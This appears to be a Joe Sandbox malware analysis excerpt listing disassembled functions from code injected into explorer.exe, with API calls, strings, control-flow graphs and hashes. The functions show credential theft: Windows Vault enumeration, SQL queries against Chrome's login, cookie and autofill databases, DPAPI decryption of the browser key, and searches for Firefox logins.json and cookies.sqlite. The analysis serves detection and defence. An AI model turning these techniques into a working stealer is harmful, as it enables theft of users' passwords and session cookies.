                                                                        • API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                        • String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
                                                                        • API String ID: 584740257-404540950
                                                                        • Opcode ID: bf4901f002e0fd683010ea7a78a0e497feab46610f869bf5b6af95a42adb82cc
                                                                        • Instruction ID: 59112e4d3581670a9b9d44edaaf76fc1725bba19cf7a6ed9b7ebd9565076a4e5
                                                                        • Opcode Fuzzy Hash: bf4901f002e0fd683010ea7a78a0e497feab46610f869bf5b6af95a42adb82cc
                                                                        • Instruction Fuzzy Hash: A2E1CF74228342AFD711EF25C844A2FBBE9BFC5744F08892CF6858B250DB75D885DB92
                                                                        Function 03272198 Relevance: 33.5, APIs: 12, Strings: 7, Instructions: 242libraryloaderCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 134 3272198-32721c9 RtlZeroMemory GetVersionExW 135 32721d7-32721dc 134->135 136 32721cb-32721d0 134->136 138 32721de 135->138 139 32721e3-32721f6 LoadLibraryW 135->139 137 32721d2 136->137 136->138 137->135 138->139 140 32721fc-327223e GetProcAddress * 5 139->140 141 327249b-32724a3 139->141 142 3272244-327224a 140->142 143 3272492-327249a FreeLibrary 140->143 142->143 144 3272250-3272252 142->144 143->141 144->143 145 3272258-327225a 144->145 145->143 146 3272260-3272265 145->146 146->143 147 327226b-3272277 146->147 148 327227e-3272280 147->148 148->143 149 3272286-32722a5 148->149 151 327248b-327248f 149->151 152 32722ab-32722b3 149->152 151->143 153 3272483 152->153 154 32722b9-32722c5 152->154 153->151 155 32722c9-32722db 154->155 156 3272365-3272375 RtlCompareMemory 155->156 157 32722e1-32722f1 RtlCompareMemory 155->157 159 3272452-3272475 156->159 160 327237b-32723c9 call 3271953 * 3 156->160 158 32722f7-3272348 call 3271953 * 3 157->158 157->159 176 32723e4-32723ea 158->176 178 327234e-3272363 call 3271953 158->178 159->155 162 327247b-327247f 159->162 160->176 177 32723cb-32723dc call 3271953 160->177 162->153 181 3272431-3272433 176->181 182 32723ec-32723ee 176->182 190 32723e0 177->190 178->190 184 3272435-3272437 call 3271011 181->184 185 327243c-327243e 181->185 187 32723f0-32723f2 182->187 188 327242a-327242c call 3271011 182->188 184->185 192 3272447-3272449 185->192 193 3272440-3272442 call 3271011 185->193 187->188 194 32723f4-32723f6 187->194 188->181 190->176 192->159 195 327244b-327244d call 3271011 192->195 193->192 194->188 197 32723f8-3272406 StrStrIW 194->197 195->159 198 3272426 197->198 199 3272408-3272421 call 32717c0 * 3 197->199 198->188 199->198
                                                                        APIs
                                                                        • RtlZeroMemory.NTDLL(?,00000114), ref: 032721AF
                                                                        • GetVersionExW.KERNEL32(?), ref: 032721BE
                                                                        • LoadLibraryW.KERNELBASE(vaultcli.dll), ref: 032721E8
                                                                        • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 0327220A
                                                                        • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 03272214
                                                                        • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 03272220
                                                                        • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0327222A
                                                                        • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 03272236
                                                                        • RtlCompareMemory.NTDLL(?,032D1110,00000010), ref: 032722E8
                                                                        • RtlCompareMemory.NTDLL(?,032D1110,00000010), ref: 0327236C
                                                                          • Part of subcall function 03271953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,03272F0C), ref: 03271973
                                                                          • Part of subcall function 03271953: lstrlenW.KERNEL32(032C6564,?,?,03272F0C), ref: 03271978
                                                                          • Part of subcall function 03271953: lstrcatW.KERNEL32(00000000,?,?,?,03272F0C), ref: 03271990
                                                                          • Part of subcall function 03271953: lstrcatW.KERNEL32(00000000,032C6564,?,?,03272F0C), ref: 03271994
                                                                        • StrStrIW.SHLWAPI(?,Internet Explorer), ref: 032723FE
                                                                        • FreeLibrary.KERNELBASE(00000000), ref: 03272493
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
                                                                        • String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                                        • API String ID: 2583887280-2831467701
                                                                        • Opcode ID: 828eb7538eda034c38da703f63d568017daf4ec6bbf05fec29e4d57e1d2ed2fb
                                                                        • Instruction ID: d51fb76a071cdcac1726bba0b242a5040b55b412088a58db601af5b36df5acb2
                                                                        • Opcode Fuzzy Hash: 828eb7538eda034c38da703f63d568017daf4ec6bbf05fec29e4d57e1d2ed2fb
                                                                        • Instruction Fuzzy Hash: F3919F71A28341DFD714DF65C894A2FBBE9BFC8604F08882DF59597251DBB0E881CB52
                                                                        Function 03273098 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 248fileencryptionCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 261 3273098-32730b1 call 3271b6a 264 32730b7-32730cd 261->264 265 32733ba-32733c0 261->265 266 32730e3-3273128 call 3271000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW call 32c4bec 264->266 267 32730cf-32730d8 call 327302d 264->267 274 327312e-3273146 call 32aeeb8 266->274 275 327339b-32733a4 DeleteFileW call 3271011 266->275 271 32730dd-32730df 267->271 271->266 280 3273392-3273396 call 32c3848 274->280 281 327314c-3273158 call 32902ec 274->281 279 32733a9-32733ab 275->279 279->265 282 32733ad-32733b5 call 3272ffa 279->282 280->275 287 327315e-3273161 281->287 288 3273389-327338d call 328fb92 281->288 282->265 290 3273165-327317f call 3271fa7 287->290 288->280 293 3273185-3273196 290->293 294 327336f-327337b call 32902ec 290->294 296 32732cd-32732e7 CryptUnprotectData 293->296 297 327319c-32731ac RtlCompareMemory 293->297 294->290 302 3273381-3273385 294->302 296->294 299 32732ed-32732f2 296->299 297->296 300 32731b2-32731b4 297->300 299->294 303 32732f4-327330a call 3271fa7 299->303 300->296 301 32731ba-32731bf 300->301 301->296 304 32731c5-32731ca 301->304 302->288 308 327330c-3273312 303->308 309 3273318-327332f call 3271fa7 303->309 304->296 307 32731d0-3273253 RtlZeroMemory call 3271000 304->307 319 3273255-327326b call 3271fa7 307->319 320 32732bd 307->320 308->309 311 3273314 308->311 315 3273331-3273337 309->315 316 327333d-3273343 309->316 311->309 315->316 318 3273339 315->318 321 3273345-327334b 316->321 322 3273351-327336a call 3271798 * 3 316->322 318->316 330 327326d-3273273 319->330 331 3273279-327328e call 3271fa7 319->331 324 32732c1-32732c8 call 3271011 320->324 321->322 325 327334d 321->325 322->294 324->294 325->322 330->331 334 3273275 330->334 339 3273290-3273296 331->339 340 327329c-32732bb call 3271798 * 3 331->340 334->331 339->340 341 3273298 339->341 340->324 341->340
                                                                        APIs
                                                                          • Part of subcall function 03271B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,03272893,00000000,00000000,00000000,?), ref: 03271B82
                                                                          • Part of subcall function 03271B6A: CloseHandle.KERNELBASE(00000000), ref: 03271B8F
                                                                        • GetTempPathW.KERNEL32(00000104,00000000), ref: 032730F9
                                                                        • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 03273103
                                                                        • DeleteFileW.KERNELBASE(00000000), ref: 0327310A
                                                                        • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 03273115
                                                                        • RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 032731A4
                                                                        • RtlZeroMemory.NTDLL(?,00000040), ref: 032731D7
                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 032732DF
                                                                        • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 0327339C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                        • String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
                                                                        • API String ID: 2757140130-4052020286
                                                                        • Opcode ID: cf4c6415fe8f54c249e3d29199ae7b8376e8d8dd2a0e64d5f2e47bc73f6c27f0
                                                                        • Instruction ID: 9a394ad50219a4ab9abff69c2b14fc27cb376033f11d34811045d9e1c3b3caa5
                                                                        • Opcode Fuzzy Hash: cf4c6415fe8f54c249e3d29199ae7b8376e8d8dd2a0e64d5f2e47bc73f6c27f0
                                                                        • Instruction Fuzzy Hash: 3B91E175228342AFD710DF25C844E6FBBE9BFC5744F08492CF6859A290DB74D884CB92
                                                                        Function 03273ED9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 82stringfileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 03271000: GetProcessHeap.KERNEL32(00000008,?,032711C7,?,?,00000001,00000000,?), ref: 03271003
                                                                          • Part of subcall function 03271000: RtlAllocateHeap.NTDLL(00000000), ref: 0327100A
                                                                        • PathCombineW.SHLWAPI(00000000,00000000,*.*,?,00000000), ref: 03273F0A
                                                                        • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 03273F16
                                                                        • lstrcmpiW.KERNEL32(?,032C62CC), ref: 03273F38
                                                                        • lstrcmpiW.KERNEL32(?,032C62D0), ref: 03273F4C
                                                                        • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 03273F69
                                                                        • lstrcmpiW.KERNEL32(?,Local State), ref: 03273F7E
                                                                        • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 03273F9B
                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 03273FB5
                                                                        • FindClose.KERNELBASE(00000000), ref: 03273FC4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
                                                                        • String ID: *.*$Local State
                                                                        • API String ID: 3923353463-3324723383
                                                                        • Opcode ID: 105e50522d95e7c664d7e7811985691c64ae417a75030afbd2973aeaf2645a0b
                                                                        • Instruction ID: 6c67dc36457fa644dafc65f5306fc1bc70fec60eb1d51807e9347afff524a046
                                                                        • Opcode Fuzzy Hash: 105e50522d95e7c664d7e7811985691c64ae417a75030afbd2973aeaf2645a0b
                                                                        • Instruction Fuzzy Hash: 2821B3382303466BD710F6319C4CA2FB67CBF85641F0C4529FA52C6181DBB8948996E2
                                                                        Function 03272B15 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 102filestringCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 03271953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,03272F0C), ref: 03271973
                                                                          • Part of subcall function 03271953: lstrlenW.KERNEL32(032C6564,?,?,03272F0C), ref: 03271978
                                                                          • Part of subcall function 03271953: lstrcatW.KERNEL32(00000000,?,?,?,03272F0C), ref: 03271990
                                                                          • Part of subcall function 03271953: lstrcatW.KERNEL32(00000000,032C6564,?,?,03272F0C), ref: 03271994
                                                                        • FindFirstFileW.KERNELBASE(00000000,?,00000000,00000000,?,00000000), ref: 03272B3D
                                                                        • lstrcmpiW.KERNEL32(?,032C62CC), ref: 03272B63
                                                                        • lstrcmpiW.KERNEL32(?,032C62D0), ref: 03272B7B
                                                                          • Part of subcall function 032719B4: lstrlenW.KERNEL32(00000000,00000000,00000000,03272CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 032719C4
                                                                        • StrStrIW.SHLWAPI(00000000,logins.json), ref: 03272BE7
                                                                        • StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 03272C16
                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 03272C43
                                                                        • FindClose.KERNELBASE(00000000), ref: 03272C52
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
                                                                        • String ID: \*.*$cookies.sqlite$logins.json
                                                                        • API String ID: 1108783765-3717368146
                                                                        • Opcode ID: 598a19ce566365455abcec06469f832b1991efa11ff6767415166d5169a84d8b
                                                                        • Instruction ID: 3dfe6c77fb98a39f67b8673e550498dcd5d20fd8c41704425765e262ab18c5e2
                                                                        • Opcode Fuzzy Hash: 598a19ce566365455abcec06469f832b1991efa11ff6767415166d5169a84d8b
                                                                        • Instruction Fuzzy Hash: 9531B734334355CBDB14FB715848A3E72DABFC4600B084E2CE856D7245DBB9D9C69252
                                                                        Function 03271D4A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 109stringfileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 531 3271d4a-3271d5c 532 3271eb4-3271ebe 531->532 533 3271d62-3271d66 531->533 533->532 534 3271d6c-3271d77 call 32719b4 533->534 537 3271d8b-3271d97 call 3271953 534->537 538 3271d79-3271d89 call 3271953 534->538 543 3271d9b-3271d9d 537->543 538->543 543->532 544 3271da3-3271db4 FindFirstFileW 543->544 545 3271ead-3271eaf call 3271011 544->545 546 3271dba 544->546 545->532 547 3271dbe-3271dc3 546->547 549 3271dc5-3271dd7 lstrcmpiW 547->549 550 3271e3d-3271e6a call 3271953 call 327199d lstrcmpiW 547->550 552 3271e8e-3271e9c FindNextFileW 549->552 553 3271ddd-3271def lstrcmpiW 549->553 561 3271e87-3271e89 call 3271011 550->561 562 3271e6c-3271e75 call 3271cf7 550->562 552->547 556 3271ea2-3271ea9 FindClose 552->556 553->552 555 3271df5-3271e00 call 32719b4 553->555 563 3271e02-3271e07 555->563 564 3271e09 555->564 556->545 561->552 562->561 570 3271e77-3271e7f 562->570 566 3271e0b-3271e3b call 3271953 call 327199d call 3271d4a 563->566 564->566 566->561 570->561
                                                                        APIs
                                                                          • Part of subcall function 032719B4: lstrlenW.KERNEL32(00000000,00000000,00000000,03272CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 032719C4
                                                                        • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 03271DA9
                                                                        • lstrcmpiW.KERNEL32(?,032C62CC), ref: 03271DCF
                                                                        • lstrcmpiW.KERNEL32(?,032C62D0), ref: 03271DE7
                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 03271E62
                                                                          • Part of subcall function 03271CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,03272C27), ref: 03271D02
                                                                          • Part of subcall function 03271CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 03271D0D
                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 03271E94
                                                                        • FindClose.KERNELBASE(00000000), ref: 03271EA3
                                                                          • Part of subcall function 03271953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,03272F0C), ref: 03271973
                                                                          • Part of subcall function 03271953: lstrlenW.KERNEL32(032C6564,?,?,03272F0C), ref: 03271978
                                                                          • Part of subcall function 03271953: lstrcatW.KERNEL32(00000000,?,?,?,03272F0C), ref: 03271990
                                                                          • Part of subcall function 03271953: lstrcatW.KERNEL32(00000000,032C6564,?,?,03272F0C), ref: 03271994
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
                                                                        • String ID: *.*$\*.*
                                                                        • API String ID: 232625764-1692270452
                                                                        • Opcode ID: 1ee9ae9bd52010c8a6876952d3e5ccbacc125b686016a065b1a6b3bdf4e26b3c
                                                                        • Instruction ID: 90423cbd849df7a54cd9dd86644a4612cacf561d6aad973f6530617ec74df3b8
                                                                        • Opcode Fuzzy Hash: 1ee9ae9bd52010c8a6876952d3e5ccbacc125b686016a065b1a6b3bdf4e26b3c
                                                                        • Instruction Fuzzy Hash: 1031BA343343429BCB20FB349888A7F76E9BFC4240F08462DE94697244DB75E8D58792
                                                                        Function 03273E04 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 75encryptionCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 641 3273e04-3273e11 call 3271b6a 644 3273e17-3273e22 call 3271c31 641->644 645 3273ed4-3273ed8 641->645 644->645 648 3273e28-3273e34 call 3272fb1 644->648 651 3273e3a-3273e4f call 327123b 648->651 652 3273ec8-3273ecc 648->652 655 3273e51-3273e58 651->655 656 3273ec0-3273ec7 call 3271011 651->656 652->645 658 3273ebf 655->658 659 3273e5a-3273e6a 655->659 656->652 658->656 661 3273e6c-3273e7c RtlCompareMemory 659->661 662 3273eb8-3273eba call 3271011 659->662 661->662 664 3273e7e-3273ea6 CryptUnprotectData 661->664 662->658 664->662 665 3273ea8-3273ead 664->665 665->662 666 3273eaf-3273eb3 665->666 666->662
                                                                        APIs
                                                                          • Part of subcall function 03271B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,03272893,00000000,00000000,00000000,?), ref: 03271B82
                                                                          • Part of subcall function 03271B6A: CloseHandle.KERNELBASE(00000000), ref: 03271B8F
                                                                          • Part of subcall function 03271C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,03273E1E,00000000,?,03273FA8), ref: 03271C46
                                                                          • Part of subcall function 03271C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,03273FA8), ref: 03271C56
                                                                          • Part of subcall function 03271C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,03273FA8), ref: 03271C76
                                                                          • Part of subcall function 03271C31: CloseHandle.KERNELBASE(00000000,?,03273FA8), ref: 03271C91
                                                                          • Part of subcall function 03272FB1: StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,03273E30,00000000,00000000,?,03273FA8), ref: 03272FC1
                                                                          • Part of subcall function 03272FB1: lstrlen.KERNEL32("encrypted_key":",?,03273FA8), ref: 03272FCE
                                                                          • Part of subcall function 03272FB1: StrStrIA.SHLWAPI("encrypted_key":",032C692C,?,03273FA8), ref: 03272FDD
                                                                          • Part of subcall function 0327123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,03273E4B,00000000), ref: 0327124A
                                                                          • Part of subcall function 0327123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 03271268
                                                                          • Part of subcall function 0327123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 03271295
                                                                        • RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 03273E74
                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 03273E9E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
                                                                        • String ID: $DPAP$DPAP$IDPAP
                                                                        • API String ID: 3076719866-957854035
                                                                        • Opcode ID: b1dea9ffc24e0ca37e074e62f56d80e3f11cd326bd8f77f4e318f1d5b319b4a3
                                                                        • Instruction ID: 80052907c1cf8bcbd99bb27fbcb7f26825f3d8122c20e9316c430ff27e096c8c
                                                                        • Opcode Fuzzy Hash: b1dea9ffc24e0ca37e074e62f56d80e3f11cd326bd8f77f4e318f1d5b319b4a3
                                                                        • Instruction Fuzzy Hash: D621C3766343465BD711EA698880ABFF2DDBF84600F48092DE941CB200EBB4D98997D3
                                                                        Function 03274B92 Relevance: 3.0, APIs: 2, Instructions: 26nativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 03271162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0327116F
                                                                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 03274BB6
                                                                        • NtUnmapViewOfSection.NTDLL(000000FF), ref: 03274BBF
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                                        • String ID:
                                                                        • API String ID: 1675517319-0
                                                                        • Opcode ID: eafdec0fc7f19011f97f9b9af827ab48e2624d8fb6f2ce7f9d71c269c1d8bd9f
                                                                        • Instruction ID: cfd65dcfd44cd013ef0f1e20a48e497e2ab7c17e04dbbcc676b3dddce5e8068f
                                                                        • Opcode Fuzzy Hash: eafdec0fc7f19011f97f9b9af827ab48e2624d8fb6f2ce7f9d71c269c1d8bd9f
                                                                        • Instruction Fuzzy Hash: C4E0DF31D31320ABC658FB32BC0CE5B3B9CBF81361F14C969E1659A084CB758C908A61
                                                                        Function 03276512 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetSystemInfo.KERNELBASE(032D20A4,00000001,00000000,0000000A,032C3127,032728DA,00000000,?), ref: 0327BFFC
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: InfoSystem
                                                                        • String ID:
                                                                        • API String ID: 31276548-0
                                                                        • Opcode ID: 7a5d522b96fb8f22afc0bd8d740a7e9c85f56fab4978e192cffb434d12429d59
                                                                        • Instruction ID: 7bcb0fa90d6c3d54893c9055732742846d03b1992585f0803e02008e1212d647
                                                                        • Opcode Fuzzy Hash: 7a5d522b96fb8f22afc0bd8d740a7e9c85f56fab4978e192cffb434d12429d59
                                                                        • Instruction Fuzzy Hash: BFE092797B4B0138F650F6F87C06F0E15456B80F40F608911B628AC8CACBF5A0D06422
                                                                        Function 03273C40 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 147stringfileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 03271B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,03272893,00000000,00000000,00000000,?), ref: 03271B82
                                                                          • Part of subcall function 03271B6A: CloseHandle.KERNELBASE(00000000), ref: 03271B8F
                                                                          • Part of subcall function 03271000: GetProcessHeap.KERNEL32(00000008,?,032711C7,?,?,00000001,00000000,?), ref: 03271003
                                                                          • Part of subcall function 03271000: RtlAllocateHeap.NTDLL(00000000), ref: 0327100A
                                                                        • GetTempPathW.KERNEL32(00000104,00000000), ref: 03273C6A
                                                                        • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 03273C76
                                                                        • DeleteFileW.KERNELBASE(00000000), ref: 03273C7D
                                                                        • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 03273C89
                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 03273D2F
                                                                        • lstrlen.KERNEL32(00000000), ref: 03273D36
                                                                        • wsprintfA.USER32 ref: 03273D55
                                                                        • lstrlen.KERNEL32(00000000), ref: 03273D61
                                                                        • lstrcat.KERNEL32(00000000,?), ref: 03273D89
                                                                        • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 03273DB2
                                                                        • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 03273DED
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
                                                                        • String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
                                                                        • API String ID: 2923052733-3488123210
                                                                        • Opcode ID: 5ca8a36496799bf0a964992cdcfc8f9f8fe87aa565d0a77d5d4a4df7ac608bf4
                                                                        • Instruction ID: 85baf7f34ef222f97ab74caad0692598f17e4016d4e0e1c86e824497ae637a58
                                                                        • Opcode Fuzzy Hash: 5ca8a36496799bf0a964992cdcfc8f9f8fe87aa565d0a77d5d4a4df7ac608bf4
                                                                        • Instruction Fuzzy Hash: D741B2386243426BD710FB719C84E3F77ADFF85644F04482CF945AB241DB75D88197A2
                                                                        Function 032728F8 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 158stringfileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 348 32728f8-32728fa 349 3272900-327291c call 3271000 call 32902ec 348->349 350 3272ac8-3272ada call 32c3848 DeleteFileW call 3271011 348->350 359 3272922-327293a call 3271fa7 349->359 360 3272a8f-3272aa2 call 328fb92 lstrlen 349->360 357 3272adf-3272ae6 350->357 367 327293c-3272942 359->367 368 3272948-327295f call 3271fa7 359->368 365 3272aa4-3272abc call 3271798 * 3 360->365 366 3272ac1-3272ac3 call 3271011 360->366 365->366 366->350 367->368 370 3272944 367->370 376 3272961-3272967 368->376 377 327296d-3272984 call 3271fa7 368->377 370->368 376->377 380 3272969 376->380 383 3272986-327298c 377->383 384 3272992-32729a7 call 3271fa7 377->384 380->377 383->384 385 327298e 383->385 388 32729b5-32729cc call 3271fa7 384->388 389 32729a9-32729af 384->389 385->384 393 32729ce-32729d4 388->393 394 32729da-32729e5 lstrlen 388->394 389->388 390 32729b1 389->390 390->388 393->394 397 32729d6 393->397 395 32729eb-32729f0 lstrlen 394->395 396 3272a79-3272a85 call 32902ec 394->396 395->396 398 32729f6-3272a11 call 3271000 395->398 396->359 402 3272a8b 396->402 397->394 404 3272a13 398->404 405 3272a1b-3272a56 call 3272112 wsprintfA lstrlen 398->405 402->360 404->405 408 3272a6a-3272a74 lstrcat call 3271011 405->408 409 3272a58-3272a68 call 327102f 405->409 408->396 409->408
                                                                        APIs
                                                                        • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 03272AD2
                                                                          • Part of subcall function 03271000: GetProcessHeap.KERNEL32(00000008,?,032711C7,?,?,00000001,00000000,?), ref: 03271003
                                                                          • Part of subcall function 03271000: RtlAllocateHeap.NTDLL(00000000), ref: 0327100A
                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 032729E1
                                                                        • lstrlen.KERNEL32(00000000), ref: 032729EC
                                                                        • wsprintfA.USER32 ref: 03272A38
                                                                        • lstrlen.KERNEL32(00000000), ref: 03272A44
                                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 03272A6C
                                                                        • lstrlen.KERNEL32(00000000,?,?), ref: 03272A99
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2999144909.0000000003271000.00000040.80000000.00040000.00000000.sdmp, Offset: 03271000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_3271000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
                                                                        • String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
                                                                        • API String ID: 304071051-2605711689
                                                                        • Opcode ID: ee75efd7a9866569dc7ecc975379ee175747c16f3bc471c29c9e6bcc4d5f9be7
                                                                        • Instruction ID: e6ef7b60c316eaca357ce504983a3573b5d030742f5b47ae146734c2f694b85b
                                                                        • Opcode Fuzzy Hash: ee75efd7a9866569dc7ecc975379ee175747c16f3bc471c29c9e6bcc4d5f9be7
                                                                        • Instruction Fuzzy Hash: 5151D034624387DBC725EF319850A3FB7DABF89604F084C2DF8819B252DB75E8898752
